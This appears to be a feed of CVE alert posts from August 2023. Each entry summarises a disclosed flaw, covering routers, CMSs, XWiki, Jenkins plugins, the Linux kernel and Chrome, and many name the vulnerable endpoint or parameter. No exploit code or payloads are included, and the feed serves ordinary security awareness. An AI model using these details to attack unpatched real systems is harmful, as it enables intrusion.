🚨 CVE-2023-4534A vulnerability, which was classified as problematic, was found in NeoMind Fusion Platform up to 20230731. Affected is an unknown function of the file /fusion/portal/action/Link. The manipulation of the argument link leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-238026 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-25 16:58:37 |
🚨 CVE-2023-3269A vulnerability exists in the memory management subsystem of the Linux kernel. The lock handling for accessing and updating virtual memory areas (VMAs) is incorrect, leading to use-after-free problems. This issue can be successfully exploited to execute arbitrary kernel code, escalate containers, and gain root privileges.🎖@cveNotify |
|
| 2023-08-25 16:58:36 |
🚨 CVE-2023-4448A vulnerability was found in OpenRapid RapidCMS 1.3.1 and classified as critical. This issue affects some unknown processing of the file admin/run-movepass.php. The manipulation of the argument password/password2 leads to weak password recovery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 4dff387283060961c362d50105ff8da8ea40bcbe. It is recommended to apply a patch to fix this issue. The identifier VDB-237569 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-25 16:58:35 |
🚨 CVE-2023-4447A vulnerability has been found in OpenRapid RapidCMS 1.3.1 and classified as critical. This vulnerability affects unknown code of the file admin/article-chat.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237568.🎖@cveNotify |
|
| 2023-08-25 16:58:34 |
🚨 CVE-2020-23992Cross Site Scripting (XSS) in Nagios XI 5.7.1 allows remote attackers to run arbitrary code via returnUrl parameter in a crafted GET request.🎖@cveNotify |
|
| 2023-08-25 16:58:30 |
🚨 CVE-2023-33242Crypto wallets implementing the Lindell17 TSS protocol might allow an attacker to extract the full ECDSA private key by exfiltrating a single bit in every signature attempt (256 in total) because of not adhering to the paper's security proof's assumption regarding handling aborts after a failed signature.🎖@cveNotify |
|
| 2023-08-25 16:58:28 |
🚨 CVE-2020-22524Buffer Overflow vulnerability in FreeImage_Load function in FreeImage Library 3.19.0(r1828) allows attackers to cuase a denial of service via crafted PFM file.🎖@cveNotify |
|
| 2023-08-25 16:58:27 |
🚨 CVE-2023-39747TP-Link WR841N V8, TP-Link TL-WR940N V2, and TL-WR941ND V5 were discovered to contain a buffer overflow via the radiusSecret parameter at /userRpm/WlanSecurityRpm.🎖@cveNotify |
|
| 2023-08-25 16:58:26 |
🚨 CVE-2023-39748An issue in the component /userRpm/NetworkCfgRpm of TP-Link TL-WR1041N V2 allows attackers to cause a Denial of Service (DoS) via a crafted GET request.🎖@cveNotify |
|
| 2023-08-25 13:58:18 |
🚨 CVE-2023-4478Mattermost fails to restrict which parameters' values it takes from the request during signup allowing an attacker to register users as inactive, thus blocking them from later accessing Mattermost without the system admin activating their accounts.🎖@cveNotify |
|
| 2023-08-25 10:58:27 |
🚨 CVE-2023-3406Path Traversal issue in M-Files Classic Web versions below 23.6.12695.3 and LTS Service Release Versions before 23.2 LTS SR3 allows authenticated user to read some restricted files on the web server🎖@cveNotify |
|
| 2023-08-25 10:58:26 |
🚨 CVE-2023-3425Out-of-bounds read issue in M-Files Server versions below 23.8.12892.6 and LTS Service Release Versions before 23.2 LTS SR3 allows unauthenticated user to read restricted amount of bytes from memory.🎖@cveNotify |
|
| 2023-08-25 10:58:25 |
🚨 CVE-2023-32756e-Excellence U-Office Force has a path traversal vulnerability within its file uploading and downloading functions. An unauthenticated remote attacker can exploit this vulnerability to read arbitrary system files, but can’t control system or disrupt service.🎖@cveNotify |
|
| 2023-08-25 10:58:24 |
🚨 CVE-2023-32755e-Excellence U-Office Force generates an error message in webiste service. An unauthenticated remote attacker can obtain partial sensitive system information from error message by sending a crafted command.🎖@cveNotify |
|
| 2023-08-25 10:58:20 |
🚨 CVE-2023-41173AdGuard DNS before 2.2 allows remote attackers to cause a denial of service via malformed UDP packets.🎖@cveNotify |
|
| 2023-08-25 10:58:19 |
🚨 CVE-2023-3570In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a specific HTTP DELETE request to gain full access to the device.🎖@cveNotify |
|
| 2023-08-25 10:58:18 |
🚨 CVE-2023-3573In PHOENIX CONTACTs WP 6xxx series web panels in versions prior to 4.0.10 a remote attacker with low privileges may use a command injection in a HTTP POST request releated to font configuration operations to gain full access to the device.🎖@cveNotify |
|
| 2023-08-25 10:58:14 |
🚨 CVE-2023-3261The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier contains a buffer overflow vulnerability in the librta.so.0.0.0 library.Successful exploitation could cause denial of service or unexpected behavior with respect to all interactions relying on the targeted vulnerable binary, including the ability to log in via the web server.🎖@cveNotify |
|
| 2023-08-25 10:58:13 |
🚨 CVE-2023-2673Improper Input Validation vulnerability in PHOENIX CONTACT FL/TC MGUARD Family in multiple versions may allow UDP packets to bypass the filter rules and access the solely connected device behind the MGUARD which can be used for flooding attacks.🎖@cveNotify |
|
| 2023-08-25 10:58:12 |
🚨 CVE-2023-3260The Dataprobe iBoot PDU running firmware version 1.43.03312023 or earlier is vulnerable to command injection via the `user-name` URL parameter. An authenticated malicious agent can exploit this vulnerability to execute arbitrary command on the underlying Linux operating system.🎖@cveNotify |
|
| 2023-08-25 05:58:31 |
🚨 CVE-2023-40530Improper authorization in handler for custom URL scheme issue in 'Skylark' App for Android 6.2.13 and earlier and 'Skylark' App for iOS 6.2.13 and earlier allows an attacker to lead a user to access an arbitrary website via another application installed on the user's device.🎖@cveNotify |
|
| 2023-08-25 05:58:30 |
🚨 CVE-2023-39699IceWarp Mail Server v10.4.5 was discovered to contain a local file inclusion (LFI) vulnerability via the component /calendar/minimizer/index.php. This vulnerability allows attackers to include or execute files from the local file system of the targeted server.🎖@cveNotify |
|
| 2023-08-25 05:58:29 |
🚨 CVE-2023-39700IceWarp Mail Server v10.4.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the color parameter.🎖@cveNotify |
|
| 2023-08-25 05:58:28 |
🚨 CVE-2023-38973A stored cross-site scripting (XSS) vulnerability in the Add Tag function of Badaso v2.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter.🎖@cveNotify |
|
| 2023-08-25 05:58:27 |
🚨 CVE-2023-38974A stored cross-site scripting (XSS) vulnerability in the Edit Category function of Badaso v2.9.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter.🎖@cveNotify |
|
| 2023-08-25 05:58:26 |
🚨 CVE-2023-40179Silverware Games is a premium social network where people can play games online. Prior to version 1.3.6, the Password Recovery form would throw an error if the specified email was not found in our database. It would only display the "Enter the code" form if the email is associated with a member of the site. Since version 1.3.6, the "Enter the code" form is always returned, showing the message "If the entered email is associated with an account, a code will be sent now". This change prevents potential violators from determining if our site has a user with the specified email.🎖@cveNotify |
|
| 2023-08-25 05:58:24 |
🚨 CVE-2023-40182Silverware Games is a premium social network where people can play games online. When using the Recovery form, a noticeably different amount of time passes depending of whether the specified email address presents in our database or not. This has been fixed in version 1.3.7.🎖@cveNotify |
|
| 2023-08-25 05:58:23 |
🚨 CVE-2023-40217An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as HTTP servers) that use TLS client authentication. If a TLS server-side socket is created, receives data into the socket buffer, and then is closed quickly, there is a brief window where the SSLSocket instance will detect the socket as "not connected" and won't initiate a handshake, but buffered data will still be readable from the socket buffer. This data will not be authenticated if the server-side TLS peer is expecting client certificate authentication, and is indistinguishable from valid TLS stream data. Data is limited in size to the amount that will fit in the buffer. (The TLS connection cannot directly be used for data exfiltration because the vulnerable code path requires that the connection be closed on initialization of the SSLSocket.)🎖@cveNotify |
|
| 2023-08-25 05:58:22 |
🚨 CVE-2023-40570Datasette is an open source multi-tool for exploring and publishing data. This bug affects Datasette instances running a Datasette 1.0 alpha - 1.0a0, 1.0a1, 1.0a2 or 1.0a3 - in an online accessible location but with authentication enabled using a plugin such as datasette-auth-passwords. The `/-/api` API explorer endpoint could reveal the names of both databases and tables - but not their contents - to an unauthenticated user. Datasette 1.0a4 has a fix for this issue. This will block access to the API explorer but will still allow access to the Datasette read or write JSON APIs, as those use different URL patterns within the Datasette `/database` hierarchy. This issue is patched in version 1.0a4.🎖@cveNotify |
|
| 2023-08-25 05:58:21 |
🚨 CVE-2023-40577Alertmanager handles alerts sent by client applications such as the Prometheus server. An attacker with the permission to perform POST requests on the /api/v1/alerts endpoint could be able to execute arbitrary JavaScript code on the users of Prometheus Alertmanager. This issue has been fixed in Alertmanager version 0.2.51.🎖@cveNotify |
|
| 2023-08-25 05:58:20 |
🚨 CVE-2023-40599Regular expression Denial-of-Service (ReDoS) exists in multiple add-ons for Mailform Pro CGI 4.3.1.3 and earlier, which allows a remote unauthenticated attacker to cause a denial-of-service condition. Affected add-ons are as follows: call/call.js, prefcodeadv/search.cgi, estimate/estimate.js, search/search.js, suggest/suggest.js, and coupon/coupon.js.🎖@cveNotify |
|
| 2023-08-25 05:58:19 |
🚨 CVE-2023-4520The FV Flowplayer Video Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘_fv_player_user_video’ parameter saved via the 'save' function hooked via init, and the plugin is also vulnerable to Arbitrary Usermeta Update via the 'save' function in versions up to, and including, 7.5.37.7212 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, and makes it possible to update the user metas arbitrarily, but the meta value can only be a string.🎖@cveNotify |
|
| 2023-08-25 05:58:18 |
🚨 CVE-2023-32077Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. The issue is patched in 0.17.1 and fixed in 0.18.6. If users are using 0.17.1, they should run `docker pull gravitl/netmaker:v0.17.1` and `docker-compose up -d`. This will switch them to the patched users. If users are using v0.18.0-0.18.5, they should upgrade to v0.18.6 or later. As a workaround, someone who is using version 0.17.1 can pull the latest docker image of the backend and restart the server.🎖@cveNotify |
|
| 2023-08-25 00:58:23 |
🚨 CVE-2022-39266isolated-vm is a library for nodejs which gives the user access to v8's Isolate interface. In versions 4.3.6 and prior, if the untrusted v8 cached data is passed to the API through CachedDataOptions, attackers can bypass the sandbox and run arbitrary code in the nodejs process. Version 4.3.7 changes the documentation to warn users that they should not accept `cachedData` payloads from a user.🎖@cveNotify |
|
| 2023-08-25 00:58:22 |
🚨 CVE-2022-28073A use after free in r_reg_set_value function in radare2 5.4.2 and 5.4.0.🎖@cveNotify |
|
| 2023-08-25 00:58:18 |
🚨 CVE-2023-23564An issue was discovered in Geomatika IsiGeo Web 6.0. It allows remote authenticated users to execute commands.🎖@cveNotify |
|
| 2023-08-25 00:58:17 |
🚨 CVE-2022-28071A use after free in r_reg_get_name_idx function in radare2 5.4.2 and 5.4.0.🎖@cveNotify |
|
| 2023-08-25 00:58:13 |
🚨 CVE-2022-28069A heap buffer overflow in vax_opfunction in radare2 5.4.2 and 5.4.0.🎖@cveNotify |
|
| 2023-08-25 00:58:12 |
🚨 CVE-2022-28068A heap buffer overflow in r_sleb128 function in radare2 5.4.2 and 5.4.0.🎖@cveNotify |
|
| 2023-08-25 00:58:11 |
🚨 CVE-2021-33388dpic 2021.04.10 has a Heap Buffer Overflow in themakevar() function in dpic.y🎖@cveNotify |
|
| 2023-08-24 22:58:44 |
🚨 CVE-2023-4459A NULL pointer dereference flaw was found in vmxnet3_rq_cleanup in drivers/net/vmxnet3/vmxnet3_drv.c in the networking sub-component in vmxnet3 in the Linux Kernel. This issue may allow a local attacker with normal user privilege to cause a denial of service due to a missing sanity check during cleanup.🎖@cveNotify |
|
| 2023-08-24 22:58:43 |
🚨 CVE-2023-36787Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-08-24 22:58:42 |
🚨 CVE-2023-38158Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-08-24 22:58:41 |
🚨 CVE-2023-25913Because of an authentication flaw an attacker would be capable of generating a web report that discloses sensitive information such as internal IP addresses, usernames, store names and other sensitive information.🎖@cveNotify |
|
| 2023-08-24 22:58:40 |
🚨 CVE-2023-25914Due to improper restriction, attackers could retrieve and read system files of the underlying server through the XML interface.🎖@cveNotify |
|
| 2023-08-24 22:58:36 |
🚨 CVE-2023-25915Due to improper input validation, a remote attacker could execute arbitrary commands on the target system.🎖@cveNotify |
|
| 2023-08-24 22:58:35 |
🚨 CVE-2023-4301A cross-site request forgery (CSRF) vulnerability in Jenkins Fortify Plugin 22.1.38 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-24 22:58:34 |
🚨 CVE-2023-4302A missing permission check in Jenkins Fortify Plugin 22.1.38 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-08-24 22:58:33 |
🚨 CVE-2023-4303Jenkins Fortify Plugin 22.1.38 and earlier does not escape the error message for a form validation method, resulting in an HTML injection vulnerability.🎖@cveNotify |
|
| 2023-08-24 22:58:32 |
🚨 CVE-2023-38899SQL injection vulnerability in berkaygediz O_Blog v.1.0 allows a local attacker to escalate privileges via the secure_file_priv component.🎖@cveNotify |
|
| 2023-08-24 22:58:28 |
🚨 CVE-2023-39660An issue in Gaberiele Venturi pandasai v.0.8.0 and before allows a remote attacker to execute arbitrary code via a crafted request to the prompt function.🎖@cveNotify |
|
| 2023-08-24 22:58:27 |
🚨 CVE-2023-31041An issue was discovered in SysPasswordDxe in Insyde InsydeH2O with kernel 5.0 through 5.5. System password information could optionally be stored in cleartext, which might lead to possible information disclosure.🎖@cveNotify |
|
| 2023-08-24 22:58:26 |
🚨 CVE-2023-38889An issue in Alluxio v.2.9.3 and before allows an attacker to execute arbitrary code via a crafted script to the username parameter of lluxio.util.CommonUtils.getUnixGroups(java.lang.String).🎖@cveNotify |
|
| 2023-08-24 22:58:25 |
🚨 CVE-2023-39749D-Link DAP-2660 v1.13 was discovered to contain a buffer overflow via the component /adv_resource. This vulnerability is exploited via a crafted GET request.🎖@cveNotify |
|
| 2023-08-24 22:58:21 |
🚨 CVE-2023-39750D-Link DAP-2660 v1.13 was discovered to contain a buffer overflow via the f_ipv6_enable parameter at /bsc_ipv6. This vulnerability is exploited via a crafted POST request.🎖@cveNotify |
|
| 2023-08-24 22:58:20 |
🚨 CVE-2023-39751TP-Link TL-WR941ND V6 were discovered to contain a buffer overflow via the pSize parameter at /userRpm/PingIframeRpm.🎖@cveNotify |
|
| 2023-08-24 22:58:19 |
🚨 CVE-2023-4450A vulnerability was found in jeecgboot JimuReport up to 1.6.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Template Handler. The manipulation leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.6.1 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-237571.🎖@cveNotify |
|
| 2023-08-24 22:58:18 |
🚨 CVE-2023-4453Cross-site Scripting (XSS) - Reflected in GitHub repository pimcore/pimcore prior to 10.6.8.🎖@cveNotify |
|
| 2023-08-24 22:58:17 |
🚨 CVE-2023-4454Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-24 20:58:30 |
🚨 CVE-2023-40876DedeCMS up to and including 5.7.110 was discovered to contain a cross-site scripting (XSS) vulnerability at /dede/freelist_add.php via the title parameter.🎖@cveNotify |
|
| 2023-08-24 20:58:29 |
🚨 CVE-2023-34040In Spring for Apache Kafka 3.0.9 and earlier and versions 2.9.10 and earlier, a possible deserialization attack vector existed, but only if unusual configuration was applied. An attacker would have to construct a malicious serialized object in one of the deserialization exception record headers.Specifically, an application is vulnerable when all of the following are true: * The user does not configure an ErrorHandlingDeserializer for the key and/or value of the record * The user explicitly sets container properties checkDeserExWhenKeyNull and/or checkDeserExWhenValueNull container properties to true. * The user allows untrusted sources to publish to a Kafka topicBy default, these properties are false, and the container only attempts to deserialize the headers if an ErrorHandlingDeserializer is configured. The ErrorHandlingDeserializer prevents the vulnerability by removing any such malicious headers before processing the record.🎖@cveNotify |
|
| 2023-08-24 20:58:28 |
🚨 CVE-2023-40891Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter firewallEn at /goform/SetFirewallCfg.🎖@cveNotify |
|
| 2023-08-24 20:58:24 |
🚨 CVE-2023-40893Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter time at /goform/PowerSaveSet.🎖@cveNotify |
|
| 2023-08-24 20:58:23 |
🚨 CVE-2023-40895Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter list at /goform/SetVirtualServerCfg.🎖@cveNotify |
|
| 2023-08-24 20:58:22 |
🚨 CVE-2023-40896Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter list and bindnum at /goform/SetIpMacBind.🎖@cveNotify |
|
| 2023-08-24 20:58:19 |
🚨 CVE-2023-40897Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter mac at /goform/GetParentControlInfo.🎖@cveNotify |
|
| 2023-08-24 20:58:18 |
🚨 CVE-2023-40899Tenda AC8 v4 US_AC8V4.0si_V16.03.34.06_cn was discovered to contain a stack overflow via parameter macFilterType and parameter deviceList at /goform/setMacFilterCfg.🎖@cveNotify |
|
| 2023-08-24 20:58:17 |
🚨 CVE-2023-40901Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter macFilterType and parameter deviceList at url /goform/setMacFilterCfg.🎖@cveNotify |
|
| 2023-08-24 20:58:13 |
🚨 CVE-2023-40902Tenda AC10 v4 US_AC10V4.0si_V16.03.10.13_cn was discovered to contain a stack overflow via parameter list and bindnum at /goform/SetIpMacBind.🎖@cveNotify |
|
| 2023-08-24 20:58:12 |
🚨 CVE-2023-4418A remote unprivileged attacker can sent multiple packages to the LMS5xx to disrupt its availability through a TCP SYN-based denial-of-service (DDoS) attack. By exploiting this vulnerability, an attacker can flood the targeted LMS5xx with a high volume of TCP SYN requests, overwhelming its resources and causing it to become unresponsive or unavailable for legitimate users.🎖@cveNotify |
|
| 2023-08-24 20:58:11 |
🚨 CVE-2023-4419The LMS5xx uses hard-coded credentials, which potentially allow low-skilledunauthorized remote attackers to reconfigure settings and /or disrupt the functionality of the device.🎖@cveNotify |
|
| 2023-08-24 19:58:45 |
🚨 CVE-2023-34971An inadequate encryption strength vulnerability has been reported to affect QNAP operating systems. If exploited, the vulnerability possibly allows local network clients to decrypt the data using brute force attacks via unspecified vectors.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQTS 4.5.4.2467 build 20230718 and laterQuTS hero h5.1.0.2424 build 20230609 and laterQuTS hero h4.5.4.2476 build 20230728 and later🎖@cveNotify |
|
| 2023-08-24 19:58:44 |
🚨 CVE-2023-34972A cleartext transmission of sensitive information vulnerability has been reported to affect QNAP operating systems. If exploited, the vulnerability possibly allows local network clients to read the contents of unexpected sensitive data via unspecified vectors.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2425 build 20230609 and laterQTS 5.1.0.2444 build 20230629 and laterQuTS hero h5.1.0.2424 build 20230609 and later🎖@cveNotify |
|
| 2023-08-24 19:58:42 |
🚨 CVE-2023-40706There is no limit on the number of login attempts in the web server for the SNAP PAC S1 Firmware version R10.3b. This could allow for a brute-force attack on the built-in web server login.🎖@cveNotify |
|
| 2023-08-24 19:58:41 |
🚨 CVE-2023-40707There are no requirements for setting a complex password in the built-in web server of the SNAP PAC S1 Firmware version R10.3b, which could allow for a successful brute force attack if users don't set up complex credentials.🎖@cveNotify |
|
| 2023-08-24 19:58:37 |
🚨 CVE-2023-40708The File Transfer Protocol (FTP) port is open by default in the SNAP PAC S1 Firmware version R10.3b. This could allow an adversary to access some device files.🎖@cveNotify |
|
| 2023-08-24 19:58:36 |
🚨 CVE-2023-40709An adversary could crash the entire device by sending a large quantity of ICMP requests if the controller has the built-in web server enabled but does not have the built-in web server completely set up and configured for the SNAP PAC S1 Firmware version R10.3b🎖@cveNotify |
|
| 2023-08-24 19:58:35 |
🚨 CVE-2023-40710An adversary could cause a continuous restart loop to the entire device by sending a large quantity of HTTP GET requests if the controller has the built-in web server enabled but does not have the built-in web server completely set up and configured for the SNAP PAC S1 Firmware version R10.3b🎖@cveNotify |
|
| 2023-08-24 19:58:34 |
🚨 CVE-2023-34960A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.🎖@cveNotify |
|
| 2023-08-24 19:58:33 |
🚨 CVE-2023-37914XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user who can view `Invitation.WebHome` can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This vulnerability has been patched on XWiki 14.4.8, 15.2-rc-1, and 14.10.6. Users are advised to upgrade. Users unable to upgrade may manually apply the patch on `Invitation.InvitationCommon` and `Invitation.InvitationConfig`, but there are otherwise no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-08-24 19:58:29 |
🚨 CVE-2023-34419A buffer overflow has been identified in the SetupUtility driver in some Lenovo Notebook products which may allow an attacker with local access and elevated privileges to execute arbitrary code.🎖@cveNotify |
|
| 2023-08-24 19:58:28 |
🚨 CVE-2023-40272Apache Airflow Spark Provider, versions before 4.1.3, is affected by a vulnerability that allows an attacker to pass in malicious parameters when establishing a connection giving an opportunity to read files on the Airflow server.It is recommended to upgrade to a version that is not affected.🎖@cveNotify |
|
| 2023-08-24 19:58:27 |
🚨 CVE-2023-4392A vulnerability was found in Control iD Gerencia Web 1.30 and classified as problematic. Affected by this issue is some unknown functionality of the component Cookie Handler. The manipulation leads to cleartext storage of sensitive information. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-237380. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-24 19:58:26 |
🚨 CVE-2023-39785Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the list parameter in the set_qosMib_list function.🎖@cveNotify |
|
| 2023-08-24 19:58:25 |
🚨 CVE-2023-39786Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the time parameter in the sscanf function.🎖@cveNotify |
|
| 2023-08-24 19:58:21 |
🚨 CVE-2023-39784Tenda AC8V4 V16.03.34.06 was discovered to contain a stack overflow via the list parameter in the save_virtualser_data function.🎖@cveNotify |
|
| 2023-08-24 19:58:20 |
🚨 CVE-2023-25647There is a permission and access control vulnerability in some ZTE mobile phones. Due to improper access control, applications in mobile phone could monitor the touch event.🎖@cveNotify |
|
| 2023-08-24 19:58:19 |
🚨 CVE-2023-26115All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable.🎖@cveNotify |
|
| 2023-08-24 19:58:18 |
🚨 CVE-2023-27471An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. UEFI implementations do not correctly protect and validate information contained in the 'MeSetup' UEFI variable. On some systems, this variable can be overwritten using operating system APIs. Exploitation of this vulnerability could potentially lead to denial of service for the platform.🎖@cveNotify |
|
| 2023-08-24 17:58:23 |
🚨 CVE-2023-2318DOM-based XSS in src/muya/lib/contentState/pasteCtrl.js in MarkText 0.17.1 and before on Windows, Linux and macOS allows arbitrary JavaScript code to run in the context of MarkText main window. This vulnerability can be exploited if a user copies text from a malicious webpage and paste it into MarkText.🎖@cveNotify |
|
| 2023-08-24 17:58:19 |
🚨 CVE-2023-21267In doKeyguardLocked of KeyguardViewMediator.java, there is a possible way to bypass lockdown mode with screen pinning due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-08-24 17:58:18 |
🚨 CVE-2023-40371IBM AIX 7.2, 7.3, VIOS 3.1's OpenSSH implementation could allow a non-privileged local user to access files outside of those allowed due to improper access controls. IBM X-Force ID: 263476.🎖@cveNotify |
|
| 2023-08-24 17:58:17 |
🚨 CVE-2022-38223There is an out-of-bounds write in checkType located in etc.c in w3m 0.5.3. It can be triggered by sending a crafted HTML file to the w3m binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact.🎖@cveNotify |
|
| 2023-08-24 17:58:14 |
🚨 CVE-2023-4415A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-24 17:58:13 |
🚨 CVE-2023-25399A refcounting issue which leads to potential memory leak was discovered in scipy commit 8627df31ab in Py_FindObjects() function.🎖@cveNotify |
|
| 2023-08-24 17:58:12 |
🚨 CVE-2021-33503An issue was discovered in urllib3 before 1.26.5. When provided with a URL containing many @ characters in the authority component, the authority regular expression exhibits catastrophic backtracking, causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect.🎖@cveNotify |
|
| 2023-08-24 05:58:59 |
🚨 CVE-2023-4358Use after free in DNS in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-24 05:58:58 |
🚨 CVE-2023-4359Inappropriate implementation in App Launcher in Google Chrome on iOS prior to 116.0.5845.96 allowed a remote attacker to potentially spoof elements of the security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-24 05:58:55 |
🚨 CVE-2023-4360Inappropriate implementation in Color in Google Chrome prior to 116.0.5845.96 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-24 05:58:54 |
🚨 CVE-2023-39976log_blackbox.c in libqb before 2.0.8 allows a buffer overflow via long log messages because the header size is not considered.🎖@cveNotify |
|
| 2023-08-24 05:58:53 |
🚨 CVE-2023-34475A heap use after free issue was discovered in ImageMagick's ReplaceXmpValue() function in MagickCore/profile.c. An attacker could trick user to open a specially crafted file to convert, triggering an heap-use-after-free write error, allowing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-08-24 05:58:52 |
🚨 CVE-2023-3195A stack-based buffer overflow issue was found in ImageMagick's coders/tiff.c. This flaw allows an attacker to trick the user into opening a specially crafted malicious tiff file, causing an application to crash, resulting in a denial of service.🎖@cveNotify |
|
| 2023-08-24 05:58:48 |
🚨 CVE-2023-40360QEMU through 8.0.4 accesses a NULL pointer in nvme_directive_receive in hw/nvme/ctrl.c because there is no check for whether an endurance group is configured before checking whether Flexible Data Placement is enabled.🎖@cveNotify |
|
| 2023-08-24 05:58:47 |
🚨 CVE-2023-40572XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. The create action is vulnerable to a CSRF attack, allowing script and thus remote code execution when targeting a user with script/programming right, thus compromising the confidentiality, integrity and availability of the whole XWiki installation. When a user with script right views this image and a log message `ERROR foo - Script executed!` appears in the log, the XWiki installation is vulnerable. This has been patched in XWiki 14.10.9 and 15.4RC1 by requiring a CSRF token for the actual page creation.🎖@cveNotify |
|
| 2023-08-24 05:58:46 |
🚨 CVE-2023-40573XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. XWiki supports scheduled jobs that contain Groovy scripts. Currently, the job checks the content author of the job for programming right. However, modifying or adding a job script to a document doesn't modify the content author. Together with a CSRF vulnerability in the job scheduler, this can be exploited for remote code execution by an attacker with edit right on the wiki. If the attack is successful, an error log entry with "Job content executed" will be produced. This vulnerability has been patched in XWiki 14.10.9 and 15.4RC1.🎖@cveNotify |
|
| 2023-08-24 01:58:28 |
🚨 CVE-2023-32202Walchem Intuition 9 firmware versions prior to v4.21 are vulnerable to improper authentication. Login credentials are stored in a format that could allow an attacker to use them as-is to login and gain access to the device.🎖@cveNotify |
|
| 2023-08-24 01:58:26 |
🚨 CVE-2023-36317Cross Site Scripting (XSS) vulnerability in sourcecodester Student Study Center Desk Management System 1.0 allows attackers to run arbitrary code via crafted GET request to web application URL.🎖@cveNotify |
|
| 2023-08-24 01:58:25 |
🚨 CVE-2023-38422Walchem Intuition 9 firmware versions prior to v4.21 are missing authentication for some of the API routes of the management web server. This could allow an attacker to download and export sensitive data.🎖@cveNotify |
|
| 2023-08-24 01:58:24 |
🚨 CVE-2023-3453ETIC Telecom RAS versions 4.7.0 and prior the web management portal authentication disabled by default. This could allow an attacker with adjacent network access to alter the configuration of the device or cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-08-24 01:58:22 |
🚨 CVE-2023-41028A stack-based buffer overflow exists in Juplink RX4-1500, a WiFi router, in versions 1.0.2 through 1.0.5. An authenticated attacker can exploit this vulnerability to achieve code execution as root.🎖@cveNotify |
|
| 2023-08-23 23:58:17 |
